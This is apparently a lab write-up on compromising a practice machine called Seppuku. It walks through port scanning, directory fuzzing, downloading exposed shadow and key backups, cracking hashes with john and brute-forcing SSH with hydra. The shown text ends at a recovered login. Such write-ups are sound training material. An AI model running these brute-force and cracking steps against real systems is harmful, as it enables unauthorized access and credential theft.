Pwned Date - 6th July 2022

Enumeration

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http          nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\\x0D
|_  Basic realm=Restricted Content
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
|_http-server-header: LiteSpeed
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_http-title: Did not follow redirect to <https://192.168.125.90:7080/>
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http          LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m06s, deviation: 2h18m37s, median: 4s
| smb2-time: 
|   date: 2022-07-03T13:45:29
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\\x00
|   Domain name: \\x00
|   FQDN: seppuku
|_  System time: 2022-07-03T09:45:33-04:00

Tried smbclient and FTP anonymous login but no luck.

On port 80 it will prompt for login, then went to port 7080 and the SSL having problem the browser won’t load. Then we see there is another port opened at 7601 which is running Apache

Untitled

We did a fuzzy duck on port 7601

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.90:7601 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php,txt
Error: error on parsing arguments: url scheme not specified
                                                                                                                                                                                  
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.81.90:7601> -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php,txt
/.htpasswd            (Status: 403) [Size: 280]
/.hta.txt             (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/a                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/a/>]
/.htaccess            (Status: 403) [Size: 280]                                   
/b                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/b/>]
/c                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/c/>]
/ckeditor             (Status: 301) [Size: 324] [--> <http://192.168.81.90:7601/ckeditor/>]
/database             (Status: 301) [Size: 324] [--> <http://192.168.81.90:7601/database/>]
/d                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/d/>]       
/e                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/e/>]       
/f                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/f/>]       
/h                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/h/>]       
/index.html           (Status: 200) [Size: 171]                                          
/keys                 (Status: 301) [Size: 320] [--> <http://192.168.81.90:7601/keys/>]    
/q                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/q/>]       
/r                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/r/>]       
/production           (Status: 301) [Size: 326] [--> <http://192.168.81.90:7601/production/>]
/server-status        (Status: 403) [Size: 280]                                            
/secret               (Status: 301) [Size: 322] [--> <http://192.168.81.90:7601/secret/>]    
/t                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/t/>]         
/w                    (Status: 301) [Size: 317] [--> <http://192.168.81.90:7601/w/>]

There is some spicy stuff on /secret

Untitled

Also on /w

Untitled

And lastly on /keys

Untitled

Finally after downloading all those rubbish this is the final trashcan I collected

┌──(kali㉿VirtualBox)-[~/seppuku]
└─$ ll
total 80K
-rw-r--r-- 1 kali kali  59K Sep 12  2018 jack.jpg
-rw-r--r-- 1 kali kali 2.8K May 13  2020 passwd.bak
-rw-r--r-- 1 kali kali  672 May 13  2020 password.lst
-rw-r--r-- 1 kali kali 1.7K May 13  2020 private
-rw-r--r-- 1 kali kali 1.7K May 13  2020 private.bak
-rw-r--r-- 1 kali kali 1.5K May 13  2020 shadow.bak

Exploitation

First we brute force the shadow.bak with the provided password.lst

┌──(kali㉿VirtualBox)-[~/seppuku]
└─$ john --wordlist=password.lst shadow.bak

a1b2c3           (r@bbit-hole)

Then try to ssh login as r@bbit-hole but cannot.

Then, with the provided hostname seppuku we can do a brute force on ssh

┌──(kali㉿VirtualBox)-[~/seppuku]
└─$ hydra -l seppuku -P password.lst ssh://192.168.81.90 -t 64

[22][ssh] host: 192.168.81.90   login: seppuku   password: eeyoree